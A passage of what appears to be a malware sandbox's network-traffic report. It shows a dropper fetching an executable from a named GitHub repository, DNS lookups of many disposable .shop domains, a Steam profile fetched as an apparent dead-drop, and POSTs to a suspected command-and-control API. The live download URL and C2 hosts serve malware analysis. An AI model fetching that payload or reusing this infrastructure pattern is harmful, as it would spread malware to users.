                                    server-timing: cfL4;desc="?proto=TCP&rtt=32746&min_rtt=27221&rtt_var=16521&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3305&recv_bytes=611&delivery_rate=138412&cwnd=195&unsent_bytes=0&cid=648d6c4d28c82676&ts=267&x=0"
                                  • flag-gb
                                    GET
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    20.26.156.215:443
                                    Request
                                    GET /arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: github.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 302 Found
                                    Server: GitHub.com
                                    Date: Sun, 12 Jan 2025 22:21:30 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    Access-Control-Allow-Origin:
                                    Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Cache-Control: no-cache
                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                    X-Frame-Options: deny
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    Referrer-Policy: no-referrer-when-downgrade
                                    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                    Content-Length: 0
                                    X-GitHub-Request-Id: DF8B:68BE7:1EC3A58:257B8B2:67844086
                                  • flag-us
                                    GET
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    185.199.111.133:443
                                    Request
                                    GET /arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 1280512
                                    Cache-Control: max-age=300
                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                    Content-Type: application/octet-stream
                                    ETag: "aa32dfd7939370a3576a4217cc533f09f4cd2cc2fdc222913611038268418b02"
                                    Strict-Transport-Security: max-age=31536000
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: deny
                                    X-XSS-Protection: 1; mode=block
                                    X-GitHub-Request-Id: DDCE:3189D4:4962BE:6291B8:6784406B
                                    Accept-Ranges: bytes
                                    Date: Sun, 12 Jan 2025 22:21:58 GMT
                                    Via: 1.1 varnish
                                    X-Served-By: cache-lcy-eglc8600059-LCY
                                    X-Cache: HIT
                                    X-Cache-Hits: 1
                                    X-Timer: S1736720518.346895,VS0,VE3
                                    Vary: Authorization,Accept-Encoding,Origin
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    X-Fastly-Request-ID: ea85a033adab9788f530de5959e6130be77542f9
                                    Expires: Sun, 12 Jan 2025 22:26:58 GMT
                                    Source-Age: 26
                                  • flag-us
                                    DNS
                                    cureprouderio.click
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cureprouderio.click
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cureprouderio.click
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cureprouderio.click
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    nearycrepso.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    nearycrepso.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    nearycrepso.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    nearycrepso.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    abruptyopsn.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    abruptyopsn.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    abruptyopsn.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    abruptyopsn.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    wholersorie.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    wholersorie.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    wholersorie.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    wholersorie.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    framekgirus.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    framekgirus.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    framekgirus.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    framekgirus.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    tirepublicerj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tirepublicerj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    tirepublicerj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tirepublicerj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    noisycuttej.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    noisycuttej.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    noisycuttej.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    noisycuttej.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    rabidcowse.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rabidcowse.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    rabidcowse.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rabidcowse.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cloudewahsj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cloudewahsj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cloudewahsj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cloudewahsj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    steamcommunity.com
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    steamcommunity.com
                                    IN A
                                    Response
                                    steamcommunity.com
                                    IN A
                                    23.67.133.187
                                  • flag-us
                                    DNS
                                    steamcommunity.com
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    steamcommunity.com
                                    IN A
                                    Response
                                    steamcommunity.com
                                    IN A
                                    23.67.133.187
                                  • flag-de
                                    GET
                                    https://steamcommunity.com/profiles/76561199724331900
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    23.67.133.187:443
                                    Request
                                    GET /profiles/76561199724331900 HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Host: steamcommunity.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 12 Jan 2025 22:21:59 GMT
                                    Content-Length: 35608
                                    Connection: keep-alive
                                    Set-Cookie: sessionid=f8d328cc1c16bc7314a4fa93; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                  • flag-us
                                    POST
                                    https://misha-lomonosov.com/api
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    104.21.14.233:443
                                    Request
                                    POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: misha-lomonosov.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 22:22:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: PHPSESSID=ilglacfa6oqahvoqc96v18uect; expires=Thu, 08 May 2025 16:08:39 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPEVgr8VD%2F4rYDUTAB%2F1GSUl1YT7YF%2Bnjo9HumqsLFXM0%2FcDAqqreuqwCXpFld%2FakCcS8Q0JEhKA4WhabGGywp4lkuMC7%2Fh7Syli5NVJoEKvhPuUGSie2TJoePy2geiPP9T%2BQsvG"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90108af1f8c271e4-LHR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=27650&min_rtt=26647&rtt_var=7456&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=611&delivery_rate=139805&cwnd=253&unsent_bytes=0&cid=b21e9882703b06ab&ts=269&x=0"
                                  • flag-gb
                                    GET
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    20.26.156.215:443
                                    Request
                                    GET /arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: github.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 302 Found
                                    Server: GitHub.com
                                    Date: Sun, 12 Jan 2025 22:21:30 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    Access-Control-Allow-Origin:
                                    Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Cache-Control: no-cache
                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                    X-Frame-Options: deny
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    Referrer-Policy: no-referrer-when-downgrade
                                    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                    Content-Length: 0
                                    X-GitHub-Request-Id: DFC5:6D190:1EA7696:2554377:67844093
                                  • flag-us
                                    GET
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    185.199.111.133:443
                                    Request
                                    GET /arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 1280512
                                    Cache-Control: max-age=300
                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                    Content-Type: application/octet-stream
                                    ETag: "aa32dfd7939370a3576a4217cc533f09f4cd2cc2fdc222913611038268418b02"
                                    Strict-Transport-Security: max-age=31536000
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: deny
                                    X-XSS-Protection: 1; mode=block
                                    X-GitHub-Request-Id: DDCE:3189D4:4962BE:6291B8:6784406B
                                    Accept-Ranges: bytes
                                    Date: Sun, 12 Jan 2025 22:22:11 GMT
                                    Via: 1.1 varnish
                                    X-Served-By: cache-lcy-eglc8600071-LCY
                                    X-Cache: HIT
                                    X-Cache-Hits: 4
                                    X-Timer: S1736720532.847725,VS0,VE0
                                    Vary: Authorization,Accept-Encoding,Origin
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    X-Fastly-Request-ID: 82cdbd4602dfdb72c07f625a52d825224cd0a817
                                    Expires: Sun, 12 Jan 2025 22:27:11 GMT
                                    Source-Age: 39
                                  • flag-us
                                    DNS
                                    cureprouderio.click
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cureprouderio.click
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cureprouderio.click
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cureprouderio.click
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    nearycrepso.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    nearycrepso.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    nearycrepso.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    nearycrepso.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    abruptyopsn.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    abruptyopsn.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    abruptyopsn.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    abruptyopsn.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    wholersorie.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    wholersorie.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    wholersorie.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    wholersorie.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    framekgirus.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    framekgirus.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    framekgirus.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    framekgirus.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    tirepublicerj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tirepublicerj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    tirepublicerj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    tirepublicerj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    noisycuttej.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    noisycuttej.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    noisycuttej.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    noisycuttej.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    rabidcowse.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rabidcowse.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    rabidcowse.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    rabidcowse.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cloudewahsj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cloudewahsj.shop
                                    IN A
                                    Response
                                  • flag-us
                                    DNS
                                    cloudewahsj.shop
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    cloudewahsj.shop
                                    IN A
                                    Response
                                  • flag-de
                                    GET
                                    https://steamcommunity.com/profiles/76561199724331900
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    23.67.133.187:443
                                    Request
                                    GET /profiles/76561199724331900 HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Host: steamcommunity.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                    Cache-Control: no-cache
                                    Date: Sun, 12 Jan 2025 22:22:13 GMT
                                    Content-Length: 35608
                                    Connection: keep-alive
                                    Set-Cookie: sessionid=50edc89da512ea6b17b2db1b; Path=/; Secure; SameSite=None
                                    Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                  • flag-us
                                    POST
                                    https://misha-lomonosov.com/api
                                    nvtiskfjthawsd.exe
                                    Remote address:
                                    104.21.14.233:443
                                    Request
                                    POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: misha-lomonosov.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 22:22:13 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Set-Cookie: PHPSESSID=cekmvu5qffn6lta6dlhqvh05ko; expires=Thu, 08 May 2025 16:08:52 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8xkoZLxgK9u3xhLpifK9YDL3j7O%2FdQQ7y8BMdi7bA3SgSLiL%2B7wQ1Spi218ZG25PEVTfqnMwkWjxihOr0KdUqsGcbyOhr8BHO7M9YvKHkMgx0waO7jIo4539S274%2FUS6H4yf49iV"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90108b4678bbe913-LHR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=27913&min_rtt=26726&rtt_var=7496&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3305&recv_bytes=611&delivery_rate=146994&cwnd=253&unsent_bytes=0&cid=8459cb7eb748f82b&ts=250&x=0"
                                  • 142.250.180.14:443
                                    youtu.be
                                    tls, http2
                                    chrome.exe
                                    1.1kB
                                    8.1kB
                                    9
                                    9
                                  • 142.250.180.14:443
                                    https://youtu.be/uL_USmYHfsA?si=UxQ7X85fi_EYU85C
                                    tls, http2
                                    chrome.exe
                                    2.3kB
                                    9.5kB
                                    17
                                    14

                                    HTTP Request

                                    GET https://youtu.be/uL_USmYHfsA?si=UxQ7X85fi_EYU85C
                                  • 172.217.169.78:443
                                    www.youtube.com
                                    tls, http2
                                    chrome.exe
                                    1.5kB
                                    1.6kB
                                    9
                                    6
                                  • 172.217.169.78:443
                                    https://www.youtube.com/s/desktop/b5305900/jsbin/network.vflset/network.js
                                    tls, http2
                                    chrome.exe
                                    75.4kB
                                    2.8MB
                                    1451
                                    2023

                                    HTTP Request

                                    GET https://www.youtube.com/watch?si=UxQ7X85fi_EYU85C&v=uL_USmYHfsA&feature=youtu.be

                                    HTTP Request

                                    GET https://www.youtube.com/s/player/3ede36f2/player_ias.vflset/en_US/base.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/desktop_polymer.vflset/desktop_polymer.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/webcomponents-sd.vflset/webcomponents-sd.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/jsbin/intersection-observer.min.vflset/intersection-observer.min.js

                                    HTTP Request

                                    GET https://www.youtube.com/s/player/3ede36f2/www-player.css

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-watch-page-skeleton.css

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/cssbin/www-main-desktop-player-skeleton.css

                                    HTTP Request

                                    GET https://www.youtube.com/s/desktop/b5305900/cssbin/www-onepick.css

                                    HTTP Request

